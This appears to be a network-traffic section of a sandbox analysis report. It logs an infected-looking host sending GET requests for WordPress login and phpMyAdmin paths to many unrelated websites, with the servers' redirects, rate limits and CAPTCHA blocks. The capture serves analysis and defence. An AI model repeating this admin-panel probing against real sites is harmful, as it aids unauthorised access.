Feb 21, 2024 00:26:12.389880896 CET	1286	IN	Data Raw: 74 65 72 3b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 65 6e 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 Data Ascii: ter; width: 100%; } .center { text-align: center; } .right { text-align: right; } .visible { display: block !important; } .invisible { display: none !i
Feb 21, 2024 00:26:12.389929056 CET	1286	IN	Data Raw: 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 64 61 70 74 69 76 65 43 6f 6c 6f 72 28 0a 20 20 20 20 20 20 20 20 68 65 78 2c 0a 20 20 20 20 20 20 20 20 64 61 72 6b 43 6f 6c 6f 72 20 3d 20 22 23 30 30 30 30 30 30 22 2c 0a 20 20 20 20 20 20 20 20 6c 69 67 Data Ascii: function adaptiveColor( hex, darkColor = "#000000", lightColor = "#FFFFFF" ) { if (hex.indexOf("#") === 0) { hex = hex.slice(1); } // convert 3-digit hex to 6-digits. i
Feb 21, 2024 00:26:12.389974117 CET	1286	IN	Data Raw: 20 6c c3 b6 73 65 6e 20 53 69 65 20 64 61 73 20 3c 62 3e 43 41 50 54 43 48 41 3c 2f 62 3e 20 75 6e 74 65 6e 2c 20 75 6d 20 77 65 69 74 65 72 20 7a 75 20 73 75 72 66 65 6e 20 75 6e 64 20 75 6e 73 20 62 65 69 20 64 65 72 20 42 65 6b c3 a4 6d 70 66 Data Ascii: lsen Sie das <b>CAPTCHA</b> unten, um weiter zu surfen und uns bei der Bekmpfung von Cyberkriminalitt zu helfen.", SUBMIT: "Lschen meiner IP", HEADING: "Warum ist das notwenig?", PRE_BODY: "Ihre IP Adresse",
Feb 21, 2024 00:26:12.390131950 CET	1286	IN	Data Raw: 42 4f 44 59 3a 20 22 59 6f 75 72 20 49 50 20 61 64 64 72 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 50 4f 53 54 5f 42 4f 44 59 3a 0a 20 20 20 20 20 20 20 20 20 20 22 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 66 6f 72 20 73 65 63 75 72 69 Data Ascii: BODY: "Your IP address", POST_BODY: "has been blocked for security reasons.<br>Probably your IP address has been used for violation of server security rules before.<br>We have to make sure that this is not a malicious, automa
Feb 21, 2024 00:26:12.390307903 CET	1286	IN	Data Raw: 61 64 6f 72 20 73 65 61 20 75 6e 61 20 70 65 72 73 6f 6e 61 20 79 20 6e 6f 20 65 6c 20 73 6f 66 74 77 61 72 65 20 64 65 20 75 6e 20 48 61 63 6b 65 72 2e 20 50 6f 72 20 66 61 76 6f 72 20 72 65 6c 6c 65 6e 65 20 65 6c 20 43 61 70 74 63 68 61 2e 20 Data Ascii: ador sea una persona y no el software de un Hacker. Por favor rellene el Captcha. Al rellenar correctamente el Captcha, su IP actual, ser eliminada automticamente de nuestra lista de IP's maliciosas.", BEST_REGARDS: "Muchas Gracias
Feb 21, 2024 00:26:12.574326038 CET	1286	IN	Data Raw: 65 20 76 61 6c 69 64 c3 a9 20 c3 a0 20 74 72 61 76 65 72 73 20 6c 65 20 3c 62 3e 43 41 50 54 43 48 41 3c 2f 62 3e 2c 20 76 6f 74 72 65 20 61 64 72 65 73 73 65 20 49 50 20 73 65 72 61 20 73 75 70 70 72 69 6d c3 a9 65 20 64 65 20 6c 61 20 6c 69 73 Data Ascii: e valid travers le <b>CAPTCHA</b>, votre adresse IP sera supprime de la liste grise de BitNinja.", BEST_REGARDS: "Merci.", SIGNATURE: "L'quipe BitNinja", ACCESSING: "Ouverture", SECURELY: "en scurit

Session ID	Source IP	Source Port	Destination IP	Destination Port
279	192.168.2.6	61032	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.218878984 CET	167	OUT	GET /pma/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.384985924 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
280	192.168.2.6	60915	23.236.62.147	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.221153975 CET	174	OUT	GET /wp-login.php HTTP/1.1 Host: gmcocorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.442255020 CET	536	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Length: 0 Connection: keep-alive location: https://www.gmcocorp.com/wp-login.php strict-transport-security: max-age=3600 x-wix-request-id: 1708471572.311732498865118901 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1 X-Seen-By: T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLvmNxQAS6Fdx1wVS+tohYr0m++C2XkuTvnlRFg2XiSDL,2d58ifebGbosy5xc+FRalsyZEE7GK1Cyy3c/bhdrgqLAcMnPwtjx1rIdlWIz3rYGUv7oeDpVbuklT17toxlsP Data Raw: Data Ascii:
Feb 21, 2024 00:26:12.442306042 CET	263	IN	Data Raw: 3d 3d 2c 32 55 4e 56 37 4b 4f 71 34 6f 47 6a 41 35 2b 50 4b 73 58 34 37 48 69 37 6c 48 32 76 61 65 51 68 43 31 74 78 30 33 4c 54 50 53 64 6a 50 5a 54 75 47 79 59 71 56 68 74 6d 45 49 67 4a 55 62 34 77 2c 52 38 6e 56 77 50 4a 76 39 51 4a 4c 31 6d Data Ascii: ==,2UNV7KOq4oGjA5+PKsX47Hi7lH2vaeQhC1tx03LTPSdjPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+A7UK33n7eH/krKDcczJcFk=,9n3wTMzaU7zAZzBAj7gVU6RkSst/bXPEBo8qixNbARz4D2PFRhC5HA4zrltzn4LTvpmiH49/EXqYIBhozSndWg==Cache-Control: no-cacheX-Content-Type-
Feb 21, 2024 00:26:13.314980030 CET	219	OUT	GET /wp-admin/ HTTP/1.1 Host: gmcocorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.gmcocorp.com/wp-login.php
Feb 21, 2024 00:26:13.525906086 CET	536	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Length: 0 Connection: keep-alive location: https://www.gmcocorp.com/wp-admin strict-transport-security: max-age=3600 x-wix-request-id: 1708471573.397732498865218901 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1 X-Seen-By: T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLvmNxQAS6Fdx1wVS+tohYr0m++C2XkuTvnlRFg2XiSDL,2d58ifebGbosy5xc+FRalo0UTBSZyvDaOwSCD+GFCQuDfZ1SgMZmNaiI2K4u+3fYsNbQdHVZQFCmoA24ggmK0g==, Data Raw: Data Ascii:
Feb 21, 2024 00:26:13.525916100 CET	259	IN	Data Raw: 55 4e 56 37 4b 4f 71 34 6f 47 6a 41 35 2b 50 4b 73 58 34 37 4a 54 50 63 43 39 66 53 6a 49 59 53 43 6c 7a 67 68 43 79 73 4b 39 6a 50 5a 54 75 47 79 59 71 56 68 74 6d 45 49 67 4a 55 62 34 77 2c 52 38 6e 56 77 50 4a 76 39 51 4a 4c 31 6d 37 38 4f 52 Data Ascii: UNV7KOq4oGjA5+PKsX47JTPcC9fSjIYSClzghCysK9jPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+CLIiD8kgg4qaApVirf92SI=,9n3wTMzaU7zAZzBAj7gVU2fsKKH7sJn/p/6jQyzEpQr4D2PFRhC5HA4zrltzn4LTKTMwo2KvhzHL95EAOgxNKQ==Cache-Control: no-cacheX-Content-Type-Opti

Session ID	Source IP	Source Port	Destination IP	Destination Port
281	192.168.2.6	61050	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.225141048 CET	167	OUT	GET /pma/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.388118029 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
282	192.168.2.6	61181	104.21.66.152	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.244352102 CET	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.tw Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
283	192.168.2.6	61047	109.71.40.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.247535944 CET	174	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: cpsgroupe.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.427963018 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:12 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 Data Ascii: 58a<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![])), east=+((+!+[])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+[])+(+![])+(+!+[]+!![]+!![]+!![]+!![]+[])+(+!+[]+!![]+!!
Feb 21, 2024 00:26:12.428023100 CET	479	IN	Data Raw: 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 Data Ascii: []+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) :
Feb 21, 2024 00:26:12.428086996 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
284	192.168.2.6	61236	104.21.54.169	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.256308079 CET	185	OUT	GET /wp-login.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.354749918 CET	703	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 21 Feb 2024 00:26:12 GMT Location: https://fortressrealcapital.com/wp-login.php Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=djY13%2Bp4raMqMb24DDDHMime5NP7Ptj1WA3kt9OSn2qpg%2Bxwby6BDWTN%2Ff4ZSP17rrFpQfoVVymXLtWGJj1cu458bEMBi%2BmojqTfviT72%2BGFsA%2B1VAtRDUx%2B40KAkJjcP95bPjfTGcnBXw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 858a835ed8d0425c-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
285	192.168.2.6	61111	144.91.85.110	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.283123016 CET	172	OUT	GET /wp-login.php HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.460454941 CET	534	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://m-viper.de/wp-login.php X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: master-only Referrer-Policy: same-origin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Feb 21, 2024 00:26:13.748815060 CET	211	OUT	GET /wp-admin/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://m-viper.de/wp-login.php
Feb 21, 2024 00:26:13.928606033 CET	531	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://m-viper.de/wp-admin/ X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: master-only Referrer-Policy: same-origin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
286	192.168.2.6	61110	15.161.71.77	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.283987999 CET	179	OUT	GET /phpmyadmin/ HTTP/1.1 Host: iisalessandrini.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.463450909 CET	675	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Server: Apache Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: same-origin Location: https://iisalessandrini.edu.it/phpmyadmin/ Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 69 73 61 6c 65 73 73 61 6e 64 72 69 6e 69 2e 65 64 75 2e 69 74 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://iisalessandrini.edu.it/phpmyadmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
287	192.168.2.6	61330	185.230.63.186	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.312892914 CET	182	OUT	GET /wp-login.php HTTP/1.1 Host: montessorihawaii.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.436786890 CET	845	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Length: 0 Connection: keep-alive location: https://www.montessorihawaii.org/wp-login.php strict-transport-security: max-age=3600 x-wix-request-id: 1708471572.350147780664612073 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLupO/enPqTWY4Qy4iOZWWztGkFvVdT2Nq6f3Hedj7ewB,2d58ifebGbosy5xc+FRaljYk8ccP0TikLfCN5nttpYZYBMOax887l1dgMtLB0LHuBON8uWMzQJDSVkFDJNhX+Q==,2UNV7KOq4oGjA5+PKsX47PIHZG7rU4AwWR8fGXl1XwJYgeUJqUXtid+86vZww+nL,Av/qWudICkhRTCN8pPYKz67T02HXAs3+PXof1ish5pM=,3+SKj2WaFkDLVdR9vyo8lJ/76x7/stiZn8lkJEBHkQI=,/j+AjfLiOiE0Vc9NsP8sK4wRwdsym/8rjzUP5A/qGmXyEPhhqrz5x6CGm56MeUd2/64sEjeNjExOBUpktkI8WA== Cache-Control: no-cache X-Content-Type-Options: nosniff
Feb 21, 2024 00:26:13.314198971 CET	235	OUT	GET /wp-admin/ HTTP/1.1 Host: montessorihawaii.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://www.montessorihawaii.org/wp-login.php
Feb 21, 2024 00:26:13.437346935 CET	841	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Length: 0 Connection: keep-alive location: https://www.montessorihawaii.org/wp-admin strict-transport-security: max-age=3600 x-wix-request-id: 1708471573.352147780664622073 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLupO/enPqTWY4Qy4iOZWWztGkFvVdT2Nq6f3Hedj7ewB,2d58ifebGbosy5xc+FRalheeXEm7zbEGbN14cgagj0+7/2E86QVq9BnsHvbzLGWiOjw033DwPcQNea77hySx/w==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,oeCSbq11YyM2LrWdre0MiAPBzEMPrQyi9uZsFRcWByA=,GCZRqREx605Y6yDgjOvSr0gzVvd88M9o49AqjE+T7lA=,/j+AjfLiOiE0Vc9NsP8sK9OGBA8EjSrrb+o8MGqPfV+fyFdu1BpPpgIayAnxFT6M+El08WdAlazUFNCK4dJeYQ== Cache-Control: no-cache X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port
288	192.168.2.6	61336	3.33.130.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:12.327049971 CET	173	OUT	GET /wp-login.php HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:12.423553944 CET	223	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:12 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/wp-login.php ETag: "65d0dd59-0"
Feb 21, 2024 00:26:13.241971970 CET	378	OUT	GET /wp-admin/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; lander_type=parkweb; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://cfgteam.com/wp-login.php
Feb 21, 2024 00:26:13.338788986 CET	220	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://cfgteam.com/wp-admin/ ETag: "65d0dd59-0"
